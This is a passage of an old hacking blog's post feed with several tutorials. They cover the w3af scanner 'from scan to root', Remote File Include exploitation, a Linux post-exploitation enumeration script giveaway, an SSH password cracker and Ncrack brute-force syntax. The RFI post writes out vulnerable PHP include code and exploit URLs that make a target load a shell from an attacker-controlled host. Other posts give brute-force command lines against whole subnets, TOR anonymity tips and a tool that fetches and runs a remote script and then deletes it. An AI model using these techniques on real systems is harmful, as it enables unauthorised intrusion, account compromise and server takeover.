<a href="http://i.imgur.com/ZG9K0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://i.imgur.com/ZG9K0.jpg" width="400" /></a></div>
<br />
Once your target is set you will want to make a few adjustments to some of the frameworks default settings under the "http-settings" and "misc-settings". I start with misc-settings, where you can update the path to Metasploit if you want to use any of the MSF payload options later this needs to be correct. Follow the same process as used for the target configuration: "set msf_location </path/to/msf3>" and hit enter. You may also want to reduce the "maxThread" count to 1. You dont have to but I find while making it a touch slower the lower thread counts tend to be less prone to errors. You can also enter "nonTargets" if you have sensitive systems on network you wish to leave out of the scan. You can also adjust a few fuzzing options and interface options here as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WgMYR.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="http://i.imgur.com/WgMYR.jpg" width="400" /></a></div>
<br />
Next we move back and then into the http-settings menu where we make a few more minor adjustments. The most notable change I make here is to swap out the default "userAgent" string. You will find some admins have blocked this UA string completely so I like to swap it out for something from http://www.useragentstring.com/pages/useragentstring.php, often just choose the latest Chrome or Firefox user-agent string unless there is a need to mimic another browser type fur custom applications or something like this. If your target site requires authentication or you want to run as deep a scan as possible you can also enter you authentication credentials in this section as well which will be used as plugins come across secure areas. You amy find in some instances you need to be authenticated to find certain vulnerabilities, supports both ntlm and basic Authentication methods. You can also choose to enable or link to a local proxy which allows you to hand off manual inspection to certain plugins in the framework. When done go back to the main menu using the "back" or CTRL+D shortcut.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/lfYkH.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/lfYkH.jpg" width="400" /></a></div>
<br />
Next we can choose to use a pre-built profile for scanning or we can configure the plugins how we like and run with a scan from there. If you want to see the profile options simply type "profiles" from the main menu prompt to drop to profiles sub-section. You can type "list" to see a listing of the available profiles. The names and descriptions should allow you to differentiate which is which and whats its purpose is. If you want to use a pre-built profile simply type "use <profile-name>" and it will setup the framework to use this profile at scan time.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RqQrj.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/RqQrj.jpg" width="400" /></a></div>
<br />
<br />
Alternatively we can skip profiles and move straight to the "plugins" sub-section from main menu and configure things how we like and then run the scan. Once you enter the plugins menu you want to type "help" to see what all is available. You can then type "list <plugin-name>" to see a list of the options under each plugin. I will walk through configuration of output plugin, all others will follow the same method for configuration so you should be able to figure it out (videos show more detail). so to configure output options we first type "list output" to see whats available. You may or may not have anything already configured but any settings we set will override existing so its not really a big deal. We have a few ways to configure options. You can simply type the plugin name followed by a comma separated list of options we want enabled (output console,csv_file,htmlFile,etc) and all items in the list will be enabled. You can use the "!" character as a NOT operator to disable an option from being included, which is handy if you use the shortcut "all" option to enable all plugins (ex: output all,!xmlFile,!emailReport,!export_requests would enable all but xml, email, and export options).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/4lFqe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/4lFqe.jpg" width="400" /></a></div>
<br />
You may also notice that on some options there is a "conf" column with "yes" in it. This indicates there are configurable options for this plugin option. If you want to review them or alter them it works similar to what we have been doing already. you type in "<plugin> config <option>" to enter the configuration menu. Once in configuration menu it works like the others where you can use "view" and "set" to list and set config options.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/HZApn.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/HZApn.jpg" width="400" /></a></div>
<br />
<br />
Rinse wash and repeat for all plugins until you have it configured how you like. Then you just type "start" to launch your scan. The scan will run in terminal and depending on your output options it may or may not display everything its doing for you. You can interpret the results as they fly across the screen or wait until it is fully finished and analyze the reports from output files (if you enabled). You can then choose to manually exploit as you like or hand off to other tools or frameworks or in some cases you can continue on with w3af and fully exploit the vulnerabilities using some of w3af's built-in tools. W3af has exploitation techniques for handing SQL injections with a SQLMAP wrapper, has xpath injection, OS command injection shell, LFI and RFI exploitation tools, as well as tools for exploiting weak webDAV functions and misconfigured eval functions.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/36mIC.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/36mIC.jpg" width="400" /></a></div>
<br />
If your scan resulted in findings of vulnerability simple run the exploit tool with the exploit plug-in matching the finding and it will do its thing. You can see a demo I put together from scan to root using both the console and GUI versions here:<br />
<br />
<b>CONSOLE Mode VIDEO Demo:</b> <a href="http://www.youtube.com/watch?v=ZQFpwTHMrxM">http://www.youtube.com/watch?v=ZQFpwTHMrxM</a><br />
<br />
<b>GUI Mode VIDEO Demo:</b> <a href="http://www.youtube.com/watch?v=dGX1KqlEEUk">http://www.youtube.com/watch?v=dGX1KqlEEUk</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com1tag:blogger.com,1999:blog-8671806905307905831.post-19652474623878130482012-05-15T12:49:00.000-05:002012-05-15T12:51:01.845-05:00Remote File Include (RFI) ExploitationRemote File Includes (a.k.a. RFI) work in the same way Local Fiel Includes (LFI) work with the main difference being instead of including local pages we will actually try to include remote pages from a different site and domain. The flaw is the same as LFI vulns but requires not only allow_url_fopen to be ON but also requires allow_url_include to be OFF. <br />
<br />
<strong>LFI:</strong> allow_url_fopen = On<br />
<strong>RFI:</strong> allow_url_include = Off<br />
<br />
When these conditions are right we can perform a Remote File Inclusion with disastewrous affects on the target site, just as you have seen in past with LFI. We can include PHP code from remote site and use it to perform command execution on the target site and ultimately leverage it to perform a full system comprimise. <br />
<br />
RFI technique can be used with straight inclusions:<br />
<blockquote class="tr_bq">
<?php<br />
$page = $_GET['page']; <br />
include($page);<br />
?> </blockquote>
<br />
As well as with NULL byte inclusions where we need to kill a appended file extension or similar:<br />
<blockquote class="tr_bq">
<?php<br />
$page = $_GET['page']; <br />
include($page . ".php");<br />
?></blockquote>
Now in order to properly get our code injected or included we need to keep it stored on a site we contorl and we need to keep it in text format as opposed to standard PHP file format (i.e. shell.txt instead of shell.php). We replace the vuln link in our target site with a reference to a our remote controled site (<a href="http://controlled.com/shell.txt">http://controlled.com/shell.txt</a>). I should note that we add a "?" to the end of our request link which will tell the target vuln server to interpret what follows as executable code. Our final exploit request link looks like this:<br />
<br />
Straight Include:<br />
<a href="http://target.com/vuln.php?page=http://controlled.com/shell.txt">http://target.com/vuln.php?page=http://controlled.com/shell.txt</a>?<br />
<br />
OR to kill appendage you might try NULL byte:<br />
<a href="http://target.com/vuln.php?page=http://controlled.com/shell.txt">http://target.com/vuln.php?page=http://controlled.com/shell.txt</a>?;<br />
<a href="http://target.com/vuln.php?page=http://controlled.com/shell.txt?">http://target.com/vuln.php?page=http://controlled.com/shell.txt?</a><br />
<br />
Depending on which technique you use you should find (if vuln) that your remote code is now being included on the target page. The above code examples would now be returning the "$page" variable as so:<br />
<br />
Straight Include: include('http://controlled.com/shell.txt'); <br />
OR<br />
NULL Byte Include: include('http://controlled.com/shell.txt?/.php'); <br />
<br />
This results in our code now being included placing our remote code actively on the immediate page. If you can't execute code you wont be able to do much other than including Google which is still vuln but you need to include a full featured shell or place custom code on your remote controlled host to comprimise things and make permanent impact on the target server.<br />
<br />
Here is a brief video I made to demonstrate how things should work for you if you come across this in one of your audits:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dxxBQ2qr8jassPvu3i6GMFKlB7wuvjYX-fTB9wv9o67Mv1umRD_nV_UhWSVk6sQphLYb1hx2zMw8qjcVEmW' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
Hope you enjoyed the show....<br />
<br />
Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-18496351037072926012012-05-15T10:10:00.000-05:002012-05-15T10:10:00.091-05:00The Inf0rm3r - Linux Enumeration ScriptHey Guys,<br />
<br />
I am back and apologize for lack of activity last month, life has been crazy lately. As some of you may or may not know I been trying to step up my post exploitation skills as well as my general Linux skills. I recently jumped to Linux OS for my main day-to-day OS and have to say I've never been happier (other than Camtasia doesn't run on Linux). Anyway, I started looking into common tasks one should perform post shell access in order to increase ones chances of gaining root access and decided to try and write my first Linux script to try and help myself and since I <3 my supporters I decided to share with you guys as well. Now everyone can download and run a exploit and cross fingers and hope it works but what if it doesn't? What if we want to still try and root the box? There are many methods one can use to still gain root access without pre-compiled exploits. I will link you to a great reference guide for some basic methods one can use to go about searching for ways to gain root access and then I will give you my new script I wrote which will try to take some of the pain out of the process for you by quickly identifying some key areas one can start looking at to get things done and/or digg out a bit more info. The tool for now only does pure enumeration but I do have a few ideas for a private version which will continue development on into the future, who knows though. That being said I give you the following which I have available now:<br />
<br />
A really good newbie guide to actual rooting methods with some understandable examples: <br /><a href="http://www.dankalia.com/tutor/01005/0100501004.htm">http://www.dankalia.com/tutor/01005/0100501004.htm</a><br />
<br />There are many other write ups out there if you search hard and do some reading. This is just a tool give-away, not a how to root the box thread. I will try to continue posting more post exploit techniques as time allows in the near future...<br />
<br />
<strong>To the Point - Downloads:</strong><br />
<div>
<strong>ZIP Download:</strong> <a href="http://uppit.com/le477muzng7f/Inf0rm3r.zip">http://uppit.com/le477muzng7f/Inf0rm3r.zip</a></div>
Inform3r.zip, contains the following:<br />
<strong>Inf0rm3r.sh:</strong><br />
<ul>
<li> Actual bash script which does the enumeration magic and can be run one its own</li>
</ul>
<strong>fetch3r:</strong><br />
<ul>
<li> side project from Inf0rme3r, C based App which remotely grabs Inf0rm3r script, runs it, and deletes it so all that is left is the report file. Also no output in terminal so can be easier on some systems (CentOS for example which have buffer size issues due to it being set at compiling time)</li>
</ul>
<div>
<strong>SCRIPT SOURCE:</strong> <a href="https://pastee.org/b4gtz">https://pastee.org/b4gtz</a></div>
<ul>
<li><strong>PASS:</strong> I<3INTRA!</li>
</ul>
I also made a brief<strong> DEMO VIDEO</strong> to highlight it in action so you get an idea for what all it captures, have a look see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/omailZHuQAY?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br /><strong>NOTE:</strong> There is function already created to handle emailing of the report file if you're running the standalone script. You just need to uncomment the code in the script and then pass a email to the script when run as an argument. It requires /bin/mail from mailutils to be installed to work. I didn't get this properly installed and set-up locally so my testing only validated the logic, not the actual emailing itself, although I had a buddy state it was working for him so its up in the air for now (hence it being commented out for this release version, we will see what future brings). <br />
<br />
Big Shout-out and special thanks to Phaedrus for helping me out with a few live test environments to fine tune a few things and th3breacher for some of the email code, suggestions and feedback!<br />
<br />
...and of course, Greetz to and from everyone in INTRA!<br />
<br />
If you have any questions, suggestions or feedback of any kind do let me know as I want to improve this over time to really be something unique and handy for the community to have.<br />
<br />
<strong>Until next time, Enjoy the pursuit for r00t!</strong>HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-86564546587849265002012-03-19T18:34:00.001-05:002012-03-21T10:20:21.930-05:00Slow Brute SSH a.k.a. slowbrute.py - A Python Based SSH Cracker, that works!<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">OK, so today I will provide you with a quick introduction to a really awesome SSH cracker which is based on Python, called Slow Brute SSH. It is python based but is still a Linux only script which works to perform targeted dictionary attacks against a specific SSH user instance. It has the ability to execute commands upon success and has an amazing success detection rate. I ran into problems using NCRACK myself and was looking for something better for this protocol. I tested 4-5 of the better known SSH cracking tools out there and this was the one that received my top rating, mainly due to its simplistic design and easy usability. Many of the other tools I reviewed required different version of LibSSH to be installed, particularly non-standard versions. This leads to tricky installations with tons of pre-requisites in order to get things working. This tool works well right out of the box as it should. It also presents successful findings in a super easy to read format. Here goes the quick overview…</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">DOWNLOAD:</b> </span><a href="http://packetstormsecurity.org/files/98803/Slow-SSH-Bruteforcer.html"><span style="font-family: Calibri;">http://packetstormsecurity.org/files/98803/Slow-SSH-Bruteforcer.html</span></a></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><span style="font-family: "Calibri", "sans-serif"; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Download and extract the tool to your Linux desktop (tar –zxvf downloadname). That’s it! It is now installed and ready to go, just jump into the folder and enter the usual “./slowbrute.py –help” to see the list of command options:</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i.imgur.com/wwYIw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img aea="true" border="0" height="268" src="http://i.imgur.com/wwYIw.png" width="320" /></a></div><br />
<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">You can see the command syntax is fairly easy to use and pick up on. You can essentially just point and shoot and the tool does all the work, easy setup. If you want to use TOR network for added anonymity just turn on TOR prior to launching and then make sure you use the “-T” or “--tor” option to route through the standard TOR port and out to target. If SSH is running on a non-standard port (22) then you can use the “–d” argument to specify the port to attack on instead of the default, if not provided the tool will assume the standard port 22 on the target. Not a lot to this one folks, simple and works well…</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">Here is a quick video to show you how it works in action against live target which NCRACK was unable to successfully register successful login against, hence this tutorial and tool highlight </span><span style="font-family: Wingdings; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; mso-symbol-font-family: Wingdings;"><span style="mso-char-type: symbol; mso-symbol-font-family: Wingdings;">J</span></span></div><br />
<strong><span style="color: red;">Video up in next 24hrs....</span></strong><br />
<br />
<strong>Until next time, Enjoy!</strong>HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-20144288777446209102012-03-19T18:28:00.001-05:002012-03-21T10:21:02.474-05:00NCRACK: The FTP/SSH/Telnet/HTTP(S)/POP3(S)/SMB/RDP & VNC Protocol Cracker<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">Ncrack is a network cracking tool that can perform bruteforce/dictionary attacks across the network. It has a wide array of modules available to use which makes it very versatile, and it is created and maintained by the same folks who gave us NMAP. Today I will show you how to use it bruteforce FTP protocol. I will be performing this attack from a Windows 7 x64 machine and my target will be a *nix machine. The full documentation on Ncrack is available from the homepage and with the download, so I will only cover FTP for now, but other protocols follow similar approach. Follow along and let the fun begin...</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">Download for your particular OS of choice can be found here: <a href="http://nmap.org/ncrack/">http://nmap.org/ncrack/</a></span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><strong>NOTE:</strong> this is a command line only tool, so you will need to navigate to where you extract it to run it or add it to your path environmental details so you can run from any terminal or console window (my preference)</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">OK, so once it is installed we do open command prompt and then navigate to our install location "CD path/ncrack", and then run a quick help check to see what options are available "ncrack -h", will look like this:</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i.imgur.com/F3U87.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img aea="true" border="0" height="320" src="http://i.imgur.com/F3U87.png" width="299" /></a></div><br />
<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">The default syntax works like this: </span></div><div class="MsoListParagraph" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l2 level1 lfo7; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">ncrack [Options] {target and service specification}</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">As you can see though, there are a lot of options available so let’s provide some clarification and then attack some targets. </span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Identifying targets:</span></b></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">You can run scans however you want to find machines with open ports (typically you can do a quick check for port 21,22, 2222, and 3389).<span style="mso-spacerun: yes;"> </span>Once you have a target or a few you can tell NCRACK how to attack. We can use the tool to attack a single IP address or a whole range of IP addresses, using standard NMAP formatting of course. We can use the following flags for inputting IP addresses, all of which have their moments as to when they are useful:</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">1.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">–iX path/to/file.xml</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">a.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This takes the output from an NMAP scan where you have used the –oX flag to indicate you want the NMAP scan results to be saved in .XML format</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">2.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">–iN path/to/file</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">a.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This takes the standard or normal output file that nmap saves from scan</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">3.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">–iL path/to/file.txt</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">a.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This takes a user provided list of hosts or network ranges</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">I tend to use options 1 the most myself as if I am not inputting an entire list I am typically only running against a single host IP which can simply be typed out on command line (you can type multiple if you want too, but I use files for more than 2 myself). I should also note that you can exclude a particular IP or range of IPs with the addition of the “–exclude IP1,IP2,IP3” or “—excludefile path/to/excludefile.txt”. This will keep from scanning sensitive or production machines if you are trying to be stealth or respectful. OK, so that covers target input, now let us move to the modules and how to set them up.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">We have modules available for cracking FTP, SSH, Telnet, HTTP(S), POP3(S), SMB, RDP, and VNC protocols. You can choose to use the modules one at a time or you can use multiple modules together to perform a multi-protocol attack. When you identify the module(s) you will use for your attack you also need to define a few configuration settings to handle timing, authentication, etc which all affect how well it does or does not work. Here are the options available and a little bit about what they do:</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l6 level1 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-m allows us to define settings specific to a single module (as defined by what follows the –m</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l6 level2 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: -m ssh:at=25</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Sets the authentication attempts (-at) per connection to 25 for the SSH module</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l6 level1 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-p allows you to choose multiple modules for attacking hosts</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l6 level2 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: -p ssh,pop3 192.168.1.0/24</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Uses SSH & POP3 modules against the whole IP range 192.168.1.0-255 since it knows to read the CIDR block /24 and convert to IP range</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">You can also have the modules run against non-standard ports by simply indicating the port after the module name or IP address</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 2in; mso-add-space: auto; mso-list: l6 level4 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: -p ssh:22,22222,pop3 192.168.1.0/24</span></div><div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 2in; mso-add-space: auto; mso-list: l6 level4 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example2: ncrack ftp://192.168.1.* <span style="mso-spacerun: yes;"> </span>ssh://192.168.1.*:2222</span></div><div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 2.5in; mso-add-space: auto; mso-list: l6 level5 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Modules will know to look on the default port if none is defined</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l6 level1 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-g allows you to set configuration settings for all options available across the board or globally, this can be used as needed or in combination with other module specific settings</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l6 level2 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: ncrack –p ssh://192.168.1.0/24,cl=25<span style="mso-spacerun: yes;"> </span>–m ssh:at=15 –g cd=3000</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This will use the SSH module against the 192.168.1.0 network, using minimum connection limit (cl=) of 25, a max authentication tries per connection of 15, while it was globally set (-g) that the connection delay between attempts be 3000 seconds</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">NOTE:</b> all timing options are assumed to be provided in seconds unless you specify otherwise. You can use one of the following appended to the time: “ms” for milliseconds, “m” for minutes, or “h” for hours. Also note that there should be no spaces when defining module details as NCRACK views anything that is not an option as a host and the space can cause errors in how things are interpreted.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">You can get very detailed with setting the timing options, as there is a great deal of flexibility allowed in the configuration settings, however I like to keep things a bit easier and use the predefined templates that are available as the tool has some cool built-in technology to help auto adjust line rates and attempts as well as metric parameters on the fly based on network traffic analysis done by the internal scan engine. You can override the timing template to use by simply using the “-T” argument following by the number of the template you want to use. These are similar to what have come to know from NMAP scans. The available options are 0-5, which equate to the following:</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4), and insane (5)</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><br />
